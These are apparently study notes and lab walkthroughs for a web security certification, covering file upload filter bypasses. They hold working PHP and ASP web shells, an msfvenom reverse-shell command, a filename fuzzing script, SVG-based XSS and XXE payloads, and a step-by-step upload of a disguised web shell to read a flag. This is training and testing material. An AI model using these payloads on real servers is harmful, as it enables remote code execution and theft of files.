Burp Suite Certified Practitioner study notes on file upload bypass
| Web Shell | Description |
|---|---|
<?php file_get_contents('/etc/passwd'); ?> |
Basic PHP File Read |
<?php system('hostname'); ?> |
Basic PHP Command Execution |
<?php echo file_get_contents('/etc/hostname'); ?> |
PHP script that executes to get the (hostname) on the back-end server Arbitrary File Upload |
<?php system($_REQUEST['cmd']); ?> |
Basic PHP Web Shell |
<?php echo shell_exec($_GET[ "cmd" ]); ?> |
Alternative PHP Webshell using shell_exec function. |
<% eval request('cmd') %> |
Basic ASP Web Shell |
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php |
Generate PHP reverse shell |
/usr/share/seclists/Web-Shells |
List of webshells for frameworks such as: CFM,FuzzDB,JSP,Laudanum, Magento, PHP, Vtiger and WordPress. |
| PHP Web Shell | PHP Web Shell |
| PHP Reverse Shell | PHP Reverse Shell |
| Web/Reverse Shells | List of Web Shells and Reverse Shells |
| Command | Description |
|---|---|
| Client-Side Bypass | Bypass the client-side file type validations |
[CTRL+SHIFT+C] |
Toggle Page Inspector |
| Blacklist Bypass | Blacklist Filters Use Burp Suite intruder to upload a single file name with list possible extensions. Then use intruder again to perform GET request on all the files upload to identify PHP execution on target. |
shell.phtml |
Uncommon Extension |
shell.pHp |
Case Manipulation |
| PHP Extensions | List of PHP Extensions |
| ASP Extensions | List of ASP Extensions |
| Web Extensions | List of Web Extensions |
| Whitelist Bypass | Whitelisting Extensions |
shell.jpg.php |
Double Extension bypass example |
shell.php.jpg |
Reverse Double Extension |
Client side html code alter to allow file upload validation bypass by removing
validate(), optional clearing theonchangeandacceptvalues.
Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings.
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
echo "shell$char$ext.jpg" >> filenames_wordlist.txt
echo "shell$ext$char.jpg" >> filenames_wordlist.txt
echo "shell.jpg$char$ext" >> filenames_wordlist.txt
echo "shell.jpg$ext$char" >> filenames_wordlist.txt
done
done| Command | Description |
|---|---|
| Web Content-Types | List of Web Content-Types |
| Content-Types | List of All Content-Types |
| File Signatures | List of File Signatures/Magic Bytes |
Example of the Payload code for the file being uploaded,
<?php echo file_get_contents('/flag.txt'); ?>, addGIF8at top of file body and keep the file name asshell.php. TheContent-Type:is then the injection payload position for Burp Suite Intruder using the above wordlists.
| Potential Attack | File Types |
|---|---|
XSS |
HTML, JS, SVG, GIF |
XXE/SSRF |
XML, SVG, PDF, PPT, DOC |
DoS |
ZIP, JPG, PNG |
This web server exercise employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"
Client-Side
HTML script functions validation cleared before loading DOM.
Blacklist & Whitelist
Fuzzing of file names with various character injections to the extensions reveal valid filenames,shell.jpg:.phar
determine valid filename and extension.
Content-Type & MIME-type
The content type and mime type combination is checked by backend and fuzzing wordlist of content type, identify valid types as:
Content-Type: image/gif
GIF8
Get sensitive info flag:
GET /profile_images/shell.jpg:.phar.
Burp Sutie Certified Practitioner Study Exercises and notes:
This File Upload exercise contains an vulnerable upload functionality that should be secure against arbitrary file uploads. But the content of the files can execute server side to read sensitive files using XXE or trigger stored XSS.
XSS inside SVG image file:
htb.svg, uploaded to target.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>When XML SVG file is upload the XSS is triggered.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>Above will render on the index landing page and retrieve the contents of
/flag.txt.
Source code of PHP files can be retrieve using Base64 to prevent execution on server, using below XML payload file upload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
You are contracted to perform a penetration test for a company's e-commerce web application. The web application is in its early stages, so you will only be testing any file upload forms you can find. Try to utilize what you learned in this module to understand how the upload form works and how to bypass various validations in place (if any) to gain remote code execution on the back-end server.
Enumerating and discovery of the web application contact form contain screenshot file upload function.
Intercept with Burp Suite and start fuzzing file uploads.
Remove client side html checks
checkfile(this)to JavaScript source code call.
<input name="uploadFile" id="uploadFile" type="file" class="custom-file-input" id="inputGroupFile02" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">
<label id="inputGroupFile01" class="custom-file-label" for="inputGroupFile02" aria-describeby="inputGroupFileAddon02">
Enumerate if possible to upload SVG extension with XML content.
Successfully read file
/etc/hostnameas POC.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/contact/upload.php"> ]>
<svg>&xxe;</svg>Get the source code for all the PHP files to find web directories, blacklist and whitelist filters etc.
Content ofupload.php.
<?php
require_once('./common-functions.php');
// uploaded files directory
$target_dir = "./user_feedback_submissions/";
// rename before storing
$fileName = date('ymd') . '_' . basename($_FILES["uploadFile"]["name"]);
$target_file = $target_dir . $fileName;
// get content headers
$contentType = $_FILES['uploadFile']['type'];
$MIMEtype = mime_content_type($_FILES['uploadFile']['tmp_name']);
// blacklist test
if (preg_match('/.+\.ph(p|ps|tml)/', $fileName)) {
echo "Extension not allowed";
die();
}
// whitelist test
if (!preg_match('/^.+\.[a-z]{2,3}g$/', $fileName)) {
echo "Only images are allowed";
die();
}
// type test
foreach (array($contentType, $MIMEtype) as $type) {
if (!preg_match('/image\/[a-z]{2,3}g/', $type)) {
echo "Only images are allowed";
die();
}
}
// size test
if ($_FILES["uploadFile"]["size"] > 500000) {
echo "File too large";
die();
}
if (move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $target_file)) {
displayHTMLImage($target_file);
} else {
echo "File failed to upload";
}The above PHP source code reveal the renamed path and file name as example will be:
http://94.237.59.206:37111/contact/user_feedback_submissions/230723_test.png
The content of apache2.conf provide log file names but nothing else.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/apache2/apache2.conf"> ]>
<svg>&xxe;</svg>Run Burp Intruder to determine valid file extensions.
PHP Extension Wordlist
Payload position on the extension of the filename and the type of attack Sniper.
Identified a valid extension as.phar.jpeg
Create PHP webshell with mime-type to bypass filters.
Create following file as
shell.phar.jpegin Linux Mousepad editor.
AAAA
<?php echo system($_GET["cmd"]);?>
Change MIME type using
hexeditorand enter the magic numbers by replacing theAAAAvalues. Magic MIME Type bytes for JPEG =FF D8 FF DB
Upload the modified webshell file to target.
Once the image webshell file upload browse to it at,
http://1.2.3.4/contact/user_feedback_submissions/230723_shell.phar.jpeg?cmd=cat+/flag.txtto obtain the flag.
